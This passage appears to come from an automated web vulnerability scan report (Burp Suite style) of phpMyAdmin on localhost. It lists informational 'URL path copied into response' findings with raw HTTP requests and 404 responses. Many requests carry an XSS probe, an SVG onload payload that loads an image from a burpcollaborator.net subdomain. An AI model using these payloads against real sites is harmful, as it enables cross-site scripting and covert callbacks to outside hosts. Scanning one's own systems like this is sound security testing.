Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//uvtxlgioilbhnfos05p3rcy4qvwqkib9z1ppgh37rw%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//uvtxlgioilbhnfos05p3rcy4qvwqkib9z1ppgh37rw\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.256. http://localhost/phpmyadmin/js/page_settings.js [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/page_settings.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//tgdw6f3n3kwg8e9rl4a2cbj3buhp5hw8k0ao7bxzm%5c56burpcollaborator.net'%3e/js/page_settings.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 418
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//tgdw6f3n3kwg8e9rl4a2cbj3buhp5hw8k0ao7bxzm\56burpcollaborator.net'&gt;/js/page_settings.js was not found on this server.</p>
...[SNIP]...
19.257. http://localhost/phpmyadmin/js/page_settings.js [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/page_settings.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//an1ddwa4a13xfvg8slhjjsqkibo6cy3prhh5es5gu%5c56burpcollaborator.net'%3e/page_settings.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 426
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//an1ddwa4a13xfvg8slhjjsqkibo6cy3prhh5es5gu\56burpcollaborator.net'&gt;/page_settings.js was not found on this server.</p>
...[SNIP]...
19.258. http://localhost/phpmyadmin/js/rte.js [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/rte.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//66a9wst0txmtyrz4bh0f2o9g1772vumpah05rxen2c%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//66a9wst0txmtyrz4bh0f2o9g1772vumpah05rxen2c\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.259. http://localhost/phpmyadmin/js/rte.js [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/rte.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//zy12olltlqemqkrx3as8uh19t0zvnnei2asyplf94%5c56burpcollaborator.net'%3e/js/rte.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 408
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//zy12olltlqemqkrx3as8uh19t0zvnnei2asyplf94\56burpcollaborator.net'&gt;/js/rte.js was not found on this server.</p>
...[SNIP]...
19.260. http://localhost/phpmyadmin/js/rte.js [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/rte.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//ej1h906865z1bzccopdnfwmoefka82zxnpdda01oq%5c56burpcollaborator.net'%3e/rte.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 416
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//ej1h906865z1bzccopdnfwmoefka82zxnpdda01oq\56burpcollaborator.net'&gt;/rte.js was not found on this server.</p>
...[SNIP]...
19.261. http://localhost/phpmyadmin/js/shortcuts_handler.js [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/shortcuts_handler.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//eo6he0b8b541gzhctpinkwrojfpad254twjkacx2lr%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:25 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 413
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//eo6he0b8b541gzhctpinkwrojfpad254twjkacx2lr\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.262. http://localhost/phpmyadmin/js/shortcuts_handler.js [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/shortcuts_handler.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//iqclg4dcd965i3jgvtkrm0tsljref678v0loib8zx%5c56burpcollaborator.net'%3e/js/shortcuts_handler.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:25 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 422
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//iqclg4dcd965i3jgvtkrm0tsljref678v0loib8zx\56burpcollaborator.net'&gt;/js/shortcuts_handler.js was not found on this server.</p>
...[SNIP]...
19.263. http://localhost/phpmyadmin/js/shortcuts_handler.js [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/shortcuts_handler.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//2il58o5w5typanb0ndcbeklcd3jy7qzsnkd8av1jq%5c56burpcollaborator.net'%3e/shortcuts_handler.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:25 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 430
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//2il58o5w5typanb0ndcbeklcd3jy7qzsnkd8av1jq\56burpcollaborator.net'&gt;/shortcuts_handler.js was not found on this server.</p>
...[SNIP]...
19.264. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.jse2e5lyhral HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:19 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 348
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.jse2e5lyhral was not found on this server.</p>
...[SNIP]...
19.265. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//2555voswstlpxny0adzb1k8c036yuqpodg340rqff%5c56burpcollaborator.net'%3e/js/vendor/codemirror/addon/hint/show-hint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 443
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//2555voswstlpxny0adzb1k8c036yuqpodg340rqff\56burpcollaborator.net'&gt;/js/vendor/codemirror/addon/hint/show-hint.js was not found on this server.</p>
...[SNIP]...
19.266. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//devg4z1714u06y7bjo8mavhn9ef931yzmrcf920qp%5c56burpcollaborator.net'%3e/vendor/codemirror/addon/hint/show-hint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 451
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//devg4z1714u06y7bjo8mavhn9ef931yzmrcf920qp\56burpcollaborator.net'&gt;/vendor/codemirror/addon/hint/show-hint.js was not found on this server.</p>
...[SNIP]...
19.267. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor06u50hvy3c/codemirror/addon/hint/show-hint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:09 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 348
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor06u50hvy3c/codemirror/addon/hint/show-hint.js was not found on this server.</p>
...[SNIP]...
19.268. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirrork9q6etq9f3/addon/hint/show-hint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:10 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 348
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirrork9q6etq9f3/addon/hint/show-hint.js was not found on this server.</p>
...[SNIP]...
19.269. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path folder 5]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js

Issue detail

The value of the URL path folder 5 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/addon4mda4ggy07/hint/show-hint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:11 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 348
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/addon4mda4ggy07/hint/show-hint.js was not found on this server.</p>
...[SNIP]...
19.270. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path folder 6]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js

Issue detail

The value of the URL path folder 6 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/addon/hint843am3lc2x/show-hint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:14 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 348
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/addon/hint843am3lc2x/show-hint.js was not found on this server.</p>
...[SNIP]...
19.271. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.jsa5eno9jw5x HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:25 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 347
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.jsa5eno9jw5x was not found on this server.</p>
...[SNIP]...
19.272. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//2775xouwutnpzn00cd1b3kac238ywqrqfi562tshh%5c56burpcollaborator.net'%3e/js/vendor/codemirror/addon/hint/sql-hint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 442
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//2775xouwutnpzn00cd1b3kac238ywqrqfi562tshh\56burpcollaborator.net'&gt;/js/vendor/codemirror/addon/hint/sql-hint.js was not found on this server.</p>
...[SNIP]...
19.273. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//ugex6g3o3lwh8f9sl5a3ccj4bvhq5i0ioaeybl29r%5c56burpcollaborator.net'%3e/vendor/codemirror/addon/hint/sql-hint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 450
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//ugex6g3o3lwh8f9sl5a3ccj4bvhq5i0ioaeybl29r\56burpcollaborator.net'&gt;/vendor/codemirror/addon/hint/sql-hint.js was not found on this server.</p>
...[SNIP]...
19.274. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendorfz0fim6z90/codemirror/addon/hint/sql-hint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:10 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 347
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendorfz0fim6z90/codemirror/addon/hint/sql-hint.js was not found on this server.</p>
...[SNIP]...
19.275. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirrormdbbvmuha2/addon/hint/sql-hint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:12 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 347
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirrormdbbvmuha2/addon/hint/sql-hint.js was not found on this server.</p>
...[SNIP]...
19.276. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path folder 5]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js

Issue detail

